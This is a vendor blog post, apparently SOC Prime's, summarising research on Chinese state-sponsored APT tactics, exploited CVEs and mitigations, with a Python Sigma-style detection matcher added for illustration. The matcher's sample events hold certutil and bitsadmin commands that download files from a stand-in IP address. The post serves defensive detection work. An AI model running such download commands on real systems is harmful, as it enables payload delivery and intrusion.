China-Backed APT Attack Detection: Withstanding the Escalating Sophistication & Maturity of Chinese State-Sponsored Offensive Operations Based on Recorded Future’s Insikt Group Research
Over the last five years, Chinese state-backed offensive campaigns have become more sophisticated, stealthier, and better coordinated. The transformation is characterized by extensive exploitation of zero-day and known vulnerabilities in public-facing security and network appliances, together with a stronger focus on operational security: attackers reduce the visible signs of intrusion by combining detection evasion techniques, living-off-the-land binaries (LOLBins), and anonymization networks. This shift toward stealth and operational security has produced a more intricate and demanding threat landscape for organizations across multiple industry verticals, including the public sector, and for the global defender community.
This article examines how China has grown into a leading global cyber power, drawing on the dedicated report from Recorded Future’s Insikt Group, and provides defenders with curated detection algorithms to proactively defend against escalating attacks by China-linked state-sponsored actors.
Detecting Chinese Nation-Backed APT Attacks Covered in the Research by Recorded Future
Over the past decade, Chinese state-sponsored actors have significantly raised the sophistication of their tactics, techniques, and procedures (TTPs). According to Insikt Group’s research, Chinese threat actors have become more strategic and stealthier, relying on zero-day and known vulnerabilities in public-facing appliances. They also route reconnaissance, exploitation, and C2 traffic through large-scale anonymization networks built from compromised IoT devices or virtual private server installations, and favor open-source malware families and public exploits that blend in with other activity and complicate attribution. Notably, China-affiliated actors have been observed sharing intelligence and offensive infrastructure while continuously exchanging knowledge and tooling.
To act faster than adversaries, cyber defenders should collaborate for better risk assessment and accurate prioritization, along with relevant detection and mitigation strategies. Rely on SOC Prime’s Platform for collective cyber defense to obtain curated detection content addressing TTPs widely used by Chinese state-sponsored groups.
Sigma Rules To Detect Commonly Observed TTPs Associated With Chinese State-Sponsored Activity
Additionally, security professionals can browse the SOC Prime Platform to obtain a dedicated detection stack aimed at identifying exploitation of zero-days leveraged by China-backed groups. Follow the link below to drill down to an extensive rule list compatible with 28 SIEM, EDR, XDR, and Data Lake technologies, mapped to the MITRE ATT&CK framework, and enriched with relevant CTI and metadata.
To obtain the full list of rules addressing TTPs described in the report from Recorded Future’s Insikt Group, hit the Explore Detections button. Security professionals can obtain in-depth intelligence accompanied by ATT&CK references and CTI links to streamline threat investigation and boost SOC productivity.
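To make concrete what such a rule evaluates, here is an added example that is not part of the original article and not SOC Prime’s or Recorded Future’s content: a minimal Sigma-style matcher in Python applied to constructed process-creation events. The rule, the field names (Image, CommandLine, ParentImage, in the style of Sysmon Event ID 1), the allow-listed parent process, and the sample events are all hypothetical. The rule flags the LOLBin pattern mentioned above, certutil or bitsadmin fetching a remote file (ATT&CK T1105), while suppressing a known-good updater via a filter block.

```python
"""Minimal Sigma-style matcher for process-creation events.

Added example, not the article's or SOC Prime's rule content. The rule
below is a hypothetical illustration of a LOLBin ingress-tool-transfer
detection (certutil/bitsadmin fetching a remote file). Field names follow
Sysmon-style keys assumed here: Image, CommandLine, ParentImage.
"""
import fnmatch
import json

# Constructed rule in a Sigma-like shape. Every key in `selection` must match
# (AND), a list value matches if any entry matches (OR), and the rule fires
# only when `selection and not filter` holds.
RULE = {
    "title": "LOLBin remote file download (illustrative)",
    "tags": ["attack.t1105", "attack.command_and_control"],
    "selection": {
        "Image|endswith": ["\\certutil.exe", "\\bitsadmin.exe"],
        "CommandLine|contains": ["http://", "https://"],
    },
    "filter": {
        # Hypothetical allow-listed software updater that legitimately
        # spawns bitsadmin; tune this to your own environment.
        "ParentImage|endswith": ["\\sccm_agent.exe"],
    },
    "condition": "selection and not filter",
}


def _field_matches(event, key, wanted):
    """Apply one Sigma field/modifier pair to an event (case-insensitive)."""
    field, _, modifier = key.partition("|")
    value = str(event.get(field, "")).lower()
    candidates = wanted if isinstance(wanted, list) else [wanted]
    candidates = [str(c).lower() for c in candidates]
    if modifier == "endswith":
        return any(value.endswith(c) for c in candidates)
    if modifier == "startswith":
        return any(value.startswith(c) for c in candidates)
    if modifier == "contains":
        return any(c in value for c in candidates)
    if modifier == "":
        # Plain Sigma values allow * and ? wildcards.
        return any(fnmatch.fnmatchcase(value, c) for c in candidates)
    raise ValueError(f"unsupported modifier: {modifier}")


def _block_matches(event, block):
    """A Sigma map is an AND across its keys."""
    return all(_field_matches(event, k, v) for k, v in block.items())


def evaluate(rule, event):
    """Return True when `selection and not filter` holds for one event."""
    selected = _block_matches(event, rule["selection"])
    flt = rule.get("filter") or {}
    # An absent/empty filter must never suppress a match.
    filtered = bool(flt) and _block_matches(event, flt)
    return selected and not filtered


def run(rule, events):
    """Return the EventIds of all events that trigger the rule."""
    return [e["EventId"] for e in events if evaluate(rule, e)]


# Constructed sample process-creation events (not real telemetry).
# 203.0.113.10 is a TEST-NET-3 documentation address.
SAMPLE_EVENTS = [
    {"EventId": 1, "Image": "C:\\Windows\\System32\\certutil.exe",
     "CommandLine": "certutil -urlcache -split -f https://203.0.113.10/a.dat C:\\ProgramData\\a.dat",
     "ParentImage": "C:\\Windows\\System32\\cmd.exe"},              # should fire
    {"EventId": 2, "Image": "C:\\Windows\\System32\\certutil.exe",
     "CommandLine": "certutil -hashfile C:\\temp\\x.iso SHA256",
     "ParentImage": "C:\\Windows\\explorer.exe"},                   # benign certutil use
    {"EventId": 3, "Image": "C:\\Windows\\System32\\bitsadmin.exe",
     "CommandLine": "bitsadmin /transfer job http://203.0.113.10/b.exe C:\\Users\\Public\\b.exe",
     "ParentImage": "C:\\Windows\\System32\\sccm_agent.exe"},       # suppressed by filter
    {"EventId": 4, "Image": "C:\\Windows\\System32\\rundll32.exe",
     "CommandLine": "rundll32.exe shell32.dll,Control_RunDLL",
     "ParentImage": "C:\\Windows\\explorer.exe"},                   # not in selection
]

if __name__ == "__main__":
    print(json.dumps({"rule": RULE["title"], "hits": run(RULE, SAMPLE_EVENTS)}))
```

Only event 1 fires: event 2 has no URL, event 3 is suppressed by the allow-listed parent, and event 4 is not a selected binary. The same structure (selection, filter, condition) is what a Sigma backend compiles into a SIEM query, so the matching semantics shown here are what you get after translation.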
Analysis of the Chinese State-Sponsored APT Attack Transformation Based on the Insikt Group Research
China has conducted malicious cyber campaigns for years, targeting U.S. and global organizations across industries to collect intelligence and sensitive data, with intrusions attributed to state-sponsored APT groups such as Mustang Panda and APT41.
The growing scope and sophistication of China-linked attacks drive the need to strengthen collective cyber defense against these coordinated offensive forces. In May 2023, the NSA, CISA, and FBI, along with other U.S. and international authorities, issued a joint cybersecurity advisory warning of a surge in malicious activity attributed to the Chinese state-backed APT known as Volt Typhoon and targeting U.S. critical infrastructure.
Chinese state-backed cyber operations are primarily conducted by the People’s Liberation Army Strategic Support Force (PLASSF) and the civilian Ministry of State Security (MSS). Over the past half-decade, Chinese APT groups have focused mainly on military and political intelligence, while also shifting toward support for strategic economic and policy objectives and targeting perceived internal threats, including ethnic and religious minorities.
Since at least 2021, China-backed groups have significantly shifted their focus to exploiting vulnerabilities in public-facing systems. Over this period, more than 85% of the zero-day vulnerabilities exploited by Chinese state-sponsored groups were in public-facing appliances, including firewalls, enterprise VPN products, hypervisors, load balancers, and email security products. Critical vulnerabilities exploited by suspected Chinese state-backed groups include CVE-2023-22515 in Confluence Data Center and Server, CVE-2023-3519, an RCE zero-day in Citrix NetScaler ADC and Gateway, and CVE-2022-42475, a heap-based buffer overflow zero-day in the Fortinet FortiOS SSL-VPN. As organizations continue migrating to cloud-based environments, targeting of these environments is likely to increase in the near future.
Beyond weaponizing zero-day and known vulnerabilities, Chinese state-sponsored groups widely use large-scale anonymization networks for reconnaissance, exploitation, and C2 infrastructure. The move toward more sophisticated and stealthier activity also involves open-source malware families and public exploits, as well as custom malware tailored to public-facing software to maintain persistence on compromised appliances.
As mitigation measures, the Insikt Group researchers recommend that organizations and individual users reduce vulnerability exposure through timely patching and continuous prioritization of critical vulnerabilities, especially RCE flaws in public-facing systems. Following network segmentation best practices, enforcing multi-factor authentication, and keeping up with updates and guidance on mitigating common TTPs associated with China-backed APT activity are also essential to minimize the risk of intrusion.
Given the growing sophistication of Chinese state-supported adversary capabilities over the last half-decade, China is highly likely to strengthen its position in cyberspace by enhancing its cyber warfare capabilities and expanding the scope of its attacks. Rely on SOC Prime to access over 500 curated detection algorithms against current and emerging APT attacks of any scope and scale and continuously reinforce your cyber resilience.